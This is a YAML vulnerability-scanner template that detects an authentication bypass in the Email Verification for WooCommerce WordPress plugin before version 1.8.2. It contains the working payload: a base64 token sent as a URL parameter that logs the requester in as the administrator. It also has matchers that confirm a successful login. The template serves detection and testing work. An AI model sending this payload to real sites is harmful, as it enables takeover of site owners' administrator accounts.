47 lines
1.5 KiB
YAML
47 lines
1.5 KiB
YAML
id: wp-woocommerce-email-verification
|
|
|
|
info:
|
|
name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
|
|
author: random_robbie,daffianfo
|
|
severity: critical
|
|
description: |
|
|
Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator.
|
|
reference:
|
|
- https://wpvulndb.com/vulnerabilities/10318
|
|
- https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cwe-id: CWE-288
|
|
metadata:
|
|
max-request: 2
|
|
tags: woocommerce,wp,wpscan,wordpress,wp-plugin
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
|
|
- "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: header
|
|
regex:
|
|
- "wordpress_logged_in_[a-z0-9]{32}"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Your account has been activated!"
|
|
- "From your account dashboard you can view your"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100987033fa8b4186e78f6073527adcb6730eff184c2fd886cdec3f48e798b7f2d9022100faad5d8bc5339281f3b2e3cb1b0687a22e516ae19dc3c5087a64427c7ed68066:922c64590222798bb761d5b6d8e72950
|